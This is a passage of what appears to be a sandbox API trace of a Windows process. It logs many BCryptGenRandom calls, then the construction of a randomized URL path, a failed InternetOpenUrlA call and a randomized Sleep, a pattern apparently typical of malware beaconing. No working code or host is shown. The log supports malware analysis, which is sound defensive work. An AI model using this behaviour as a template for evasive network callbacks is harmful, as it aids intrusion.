GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0229f, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a0229f) returned 0x0 [0248.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0248.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022ba, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a022ba) returned 0x0 [0248.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0248.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0248.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0248.957] GetProcessHeap () returned 0x440000 [0248.957] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0248.957] lstrcpyA (in: lpString1=0x472900, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0248.957] lstrcatA (in: lpString1="\x81\x03", lpString2="/F2oYpxyrp2w2k3qjF68brhj6/2oyen3fHV1wncsw93eikh6FjmgG4vmNvg/kxe44eveo1xy0c1m5d/q7kr07wd3d3mq17u27H25mCyjt/j3bq5s9Wted0fPitfnpwca0zsaR12krJc/" | out: lpString1="\x81\x03/F2oYpxyrp2w2k3qjF68brhj6/2oyen3fHV1wncsw93eikh6FjmgG4vmNvg/kxe44eveo1xy0c1m5d/q7kr07wd3d3mq17u27H25mCyjt/j3bq5s9Wted0fPitfnpwca0zsaR12krJc/") returned="\x81\x03/F2oYpxyrp2w2k3qjF68brhj6/2oyen3fHV1wncsw93eikh6FjmgG4vmNvg/kxe44eveo1xy0c1m5d/q7kr07wd3d3mq17u27H25mCyjt/j3bq5s9Wted0fPitfnpwca0zsaR12krJc/" [0248.957] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0248.958] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/F2oYpxyrp2w2k3qjF68brhj6/2oyen3fHV1wncsw93eikh6FjmgG4vmNvg/kxe44eveo1xy0c1m5d/q7kr07wd3d3mq17u27H25mCyjt/j3bq5s9Wted0fPitfnpwca0zsaR12krJc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0248.958] GetProcessHeap () returned 0x440000 [0248.958] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0248.958] GetProcessHeap () returned 0x440000 [0248.958] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02250 | out: hHeap=0x440000) returned 1 [0248.958] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0248.959] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0248.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0248.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0248.959] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0248.959] Sleep (dwMilliseconds=0x1103b) [0251.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0251.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0251.879] GetProcessHeap () returned 0x440000 [0251.879] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16f80 [0251.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0251.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16f81, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a16f81) returned 0x0 [0251.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.883] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.884] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.884] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.885] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.885] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0251.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0251.886] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 